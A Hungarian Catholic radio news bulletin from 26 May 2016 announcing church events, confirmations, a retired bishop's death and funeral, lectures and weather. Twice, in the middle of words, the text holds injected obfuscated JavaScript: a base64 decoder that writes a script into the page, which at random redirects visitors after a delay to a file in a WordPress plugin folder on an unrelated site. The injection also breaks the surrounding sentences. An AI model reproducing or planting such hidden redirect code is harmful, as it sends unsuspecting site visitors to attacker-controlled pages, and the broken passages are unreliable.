2016. május 26. – Hírek és programajánló

H Í R E K   E S T E

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében holnap Lőrinczfalván tartják az örökös szentségimádási napot. Szánjunk időt az engesztelésre és adjunk hálát Krisztusért, aki velünk maradt a legméltóságosabb Oltáriszentségben.

Folytatódnak a bérmálások egyházmegyékszerte
A gyulafehérvári főegyházmegyében holnap délelőtt tíz órakor a tordatúri templomban 4 fiatal részesül Jakubinyi György érsek kézfeltétele által a bérmálás szentségében.
A temesvári egyhézmegyében Laus Nikola püspöki irodaigazgató május 28-án, szombaton, a nagykomlósi római katolikus templomban 22 fiatalnak szolgáltatja ki a bérmálás szentségét. Az ünnepi szentmise délelőtt tíz órakor kezdődik. A nagyszentmiklósi római katolikus templomban május 29-én, vasárnap Dirschl Johann általános helynök bérmál. A délelőtt tíz órakor kezdődő szentmise keretében 60 fiatal részesül a második szentségben. Mindkét egyházközségben a fiatalok felkészítését Andó Attila nagyszentmiklósi plébános irányította.

Találkozzunk Árpád-házi Szent Erzsébettel
Folytatódik a körút melyen bemutatják Árpád-házi Szent Erzsébet ereklyéjét. Holnap délután négy órától Kézdivásárhelyen, a Boldog Özséb plébániatemplomban, majd este hét órától a kovásznai római katolikus templomban tekinthetik meg az ereklyét és imádkozhatnak a szent közbenjárásáért. Az Irgalmasság évében találkozzunk az irgalom nagy szentjével, Árpád-házi Szent Erzsébettel.

Jézus Szíve kilenced Szatmárnémetiben
Idén is kilenceddel készülnek a szatmári egyházmegye búcsújára, Jézus Szíve ünnepére, amikoris kilenc napon keresztül igyekeznek a hívek imával, elmélkedésekkel, a legszentebb áldozaton való részvétellel felkészülni az ünnep fogadására. A kilenced szentmisealkalmaira a Kálvária templomban kerül sor, este hat órai kezdési időpontokkal – kivételt képez június 3-a, amikor reggel kilenc órától is lesz szentmise. Az elmélkedések idén az Alacoque Szent Margitnak tett Jézus Szíve ígéretekre épülnek. Holnap este Rácz Gábriel István avasfelsőfalui plébános tart a szentmisében prédikációt „Megadom nekik mindazokat a kegyelmeket, amelyekre állapotuk szerint szükségük van” gondolatból indulva. A kilencedre várják a híveket, hogy a június 5-i Jézus Szíve Búcsúra mindenki hitében megerősödve érkezhessen meg.

Belső iránytű Gyergyószentmiklóson
A Belső Iránytű programsorozat keretében holnap este hét órától András Ildikó, a gyulafehérvári Caritas Otthoni Beteggondozás programjának munkatársa, Ápolókból- ápoltak, avagy hogyan éljük meg, amikor a gyermek kell gondozza a szülőt- címmel előadást tart a gyergyószentmiklósi Szent István plébánia nagytermében. Várnak minden érdeklődőt.

Előadás Csíkszeredában
Holnap délután hat órától A Test és a lélek egysége címmel Ilyés Zsolt csíkszentléleki plébános tart előadást a csíkszeredai Polgármesteri Hivatal gyűléstermében.

Lelki hétvége Segesváron
„Életünk az irgalmasság tükrében” címmel lelki hétvégére várják a híveket május 27-29 között Segesváron a Kolping Házban – tudtuk meg a gyulafehérvári érsekség honlapjáról. A hétvégén, melynek kísérője Bereczki Silvia segítőnővér lesz, lesznek majd beszélgetések, impulzusok, elmélkedések, olyan témákat érintve, mint: szeretet, irgalmasság, közösség.

Lelkinap Medgyesen
„Azokra vár a mennyekben a legértékesebb korona, akik minden munkájukat a tőlük telhető legnagyobb szorgalommal végzik. Mert nem elég önmagukban jó dolgokat tenni, jól is kell azokat tenni.” Ezzel a Szent Ignác-i gondolattal hívják közös együttlétre, Istennel és emberi találkozásra a Szeben-Fogaras-Erzsébetváros főesperesi kerület plébániáinak alkalmazottait és egyháztanácsosait, hogy a lélek megpihenhessen és erőre kapjon. Az Irgalmasság Szentévében jobban és többet kell figyelni a felebarátra, az egyházi alkalmazottra és az egyháztanácsosokra is, ezért május 28-án, szombaton, lelkinapot tartanak Medgyesen, a plébánián, melynek meghívott előadója Sajgó Balázs atya Gyergyószentmiklósról. Hívnak és várnak minden egyháztanácsost és plébániai alkalmazottat a főesperesi kerületből, hogy megújult erővel és a lehető legjobban teljesíthesse mindenki a maga szolgálatát.

Dicsőitő est Kolozsváron
Május 28-án, szombaton este hét órától a kolozsvári Báthory István Elméleti Líceum udvarában, Gyere ahogy vagy címmel dicsőítő estre várják az érdeklődőket. Részletek az érsekség honlapján, a www.romkat.ro oldalon találhatók.

Időjárás: Holnap a napos idő mellett főként keleten és délkeleten alakulhat ki egy-egy zápor, esetleg zivatar. Helyenként élénk lehet a szél. Enyhe lesz a hajnal, napközben pedig 23-29 fok közötti értékekre készülhetünk. Hétvégén igazi nyári meleg időre van kilátás.

MRE – Hírszolgálat, 2016. május 26.


H Í R E K   R E G G E L

Elhunyt Tempfli József nyugalmazott püspök
Tegnap délelőtt Tempfli József kiérdemesült nagyváradi római katolikus megyéspüspök, életének 86., papságának 54., püspökségének 27. évében, hosszú betegség után, szentségekkel ellátva visszaadta lelkét teremtőjének. Az elhunyt püspök földi maradványait május 29-én, vasárnap délután három órakor ravatalozzák fel a nagyváradi székesegyházban, majd délután hat órakor szentmisét mutatnak be lelki üdvéért. Hétfőn, május 30-án a délelőtt tizenegy órától tartfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andó engesztelő gyászmisét követően a nagyváradi székesegyház kriptájába helyezik örök nyugalomra.
Emléke és nehéz időkben tanusított rendíthetetlen hitvallása mindannyiunk számára feladat és kötelesség! Imádkozzunk lelki üdvéért, adjon az Úr örök nyugodalmat neki és az örök világosság fényeskedjék neki!
A nagyváradi püspökség egyben felhívja a figyelmet, hogy a temetésére való tekintettel a május 30-án Szentjobbra tervezett zarándoklat elmarad.

Úrnapi búcsúk és ünnepségek
A mai napon anyaszentegyházunk az Úr Testének és Vérének ünnepét, ismertebb nevén Úrnapját üli.
Ma van a székelyudvarhelyi Főesperesi Kerület búcsúünnepe. A szentmisét, melyet rádiónk élő adásban közvetít, délelőtt tizenegy órakor a Márton Áron téren Tamás József püspök mutatja be a kerület papságával együtt. Ünnepi szónok a lövétei származású Fazakas Zoltán-Márton premontrei szerzetes, csornai apát.
Gyimesbükkön az egyházközség fő búcsúnapja szintén Úrnapján van. A Dani Gergely plébános által épített templom felszentelésének negyvenedik évében ma délelőtt tizenegy órakor kezdődik az ünnepi szentmise, melynek főcelebránsa Berszán Lajos aranymisés atya, szónoka Faragó István kőhalmi plébános lesz. A szentmise előtt fél tizenegy órától az általános iskola diákjai előadást tartanak Márton Áron püspökről.
Ma délután hat órakor Nagyváradon, Böcskei László megyéspüspök a helyi hagyomány szerint a város papjaival és híveivel közösen ünnepi szentmisét mutat be a székesegyházban. A szentmisét követően kerül sor az úrnapi körmenetre a püspöki palota kertjében, melyre a főpásztor külön meghívta a város plébániáinak ez évi elsőáldozóit és bérmálkozóit. Ezen a napon a város lakói együtt imádkoznak közösségeink megerősödéséért, ezért a többi templomban elmaradnak a délutáni szentmisék.
Roos Márton megyés püspök a temesvári székesegyházban szintén délután hat órakor celebrál szentmisét, amelynek keretében az egybegyűlt lelkipásztorok és hívek az Oltáriszentséget körmenetben kísérik a felállított oltárokhoz.
Szatmárnémetiben ma este hét órától Schönberger Jenő püspök ünnepi szentmisét celebrál a Székesegyházban, a mise után pedig jó idő esetén körmenetet tartanak a város régi főterén.

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében a mai napon a zernyesti templomban tartják az örökös szentségimádási napot. Szánjunk időt az engesztelésre és adjunk hálát Krisztusért, aki velünk maradt a legméltóságosabb Oltáriszentségben.

Előadás és könyvbemutató Székelyudvarhelyen
Ma este hét órától, Székelyudvarhelyen a Szent Pio Lelkigyakorlatos Házban Bereczki Silvia segítőnővér, a Vasárnap hetilap felelős szerkesztője előadást tart „Az irgalmas szeretet átalakító ereje” címmel. Az előadás végen bemutatja a kolozsvári Verbum Keresztény Kulturális Kiadó által a szentévre megjelentett, Sokarcú irgalmasság-Vallomások, interjúk, tanulmányok című, a Keresztény Szó könyvek sorozat 5. kötetét.

Egyházmegyei családtalálkozó Nagyváradon
„Állfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andóság az ideiglenességben” mottó jegyében hatodik alkalommal tartják meg az egyházmegyei családtalálkozót szombaton, május 28-án, Nagyváradon. Az idei találkozó vendégelőadója Bíró László püspök Budapestről, aki a házastársi öröm megőrzésének titkaiba akarja bevezetni a családokat. A találkozóra várják azokat a családokat, akik nem pusztán „egymás mellett” akarnak élni a házasságban, hanem egymással örülni az együtt töltött évek minden pillanatának a házastársi szeretetben. A találkozó csúcspontja a székesegyházban délután három órakor kezdődő szentmise lesz, melyre várják mindazokat, akik imádkozni szeretnének azért, hogy a család a szeretet fészke, az ima otthona és az evangélium iskolája legyen.

50 év után is Tamási Áronnal
A farkaslaki Tamási Áron Művelődési Egyesület és a farkaslaki polgármesteri hivatal „50 év után is Tamási Áronnal” címmel rendezvénysorozat keretében emlékeznek  a falu szülőttének, Tamási Áron halálának 50. évfordulójára. Az rendezvény ma délután négy órakor kezdődik ünnepi műsorral és koszorúzással a helyi sírkertben, majd irodalmi konferencia következik, este nyolc órától pedig a helyi iskolások adják elő Tamási Áron  Dínomdánom illata című novelláját. A rendezvénysorozat egészen szombatig tart, a programban szerepelnek még különböző kiállítások, filmvetítés, illetve megemlékező szentmise a híres íróról. Minden érdeklődőt várnak!

Időjárás: Ma kevesebb zivatar és egyre több napsütés lesz. Egy-egy zápor, inkább csak északon, északnyugaton és az erdélyi medencében alakulhat ki. A többnyire mérsékelt északi-északnyugati szélben délutánra már 20 és 27 fok közé melegszik a levegő.

MRE - Hírszolgálat, 2016. május 26.

About the author

maradmin

Leave a Comment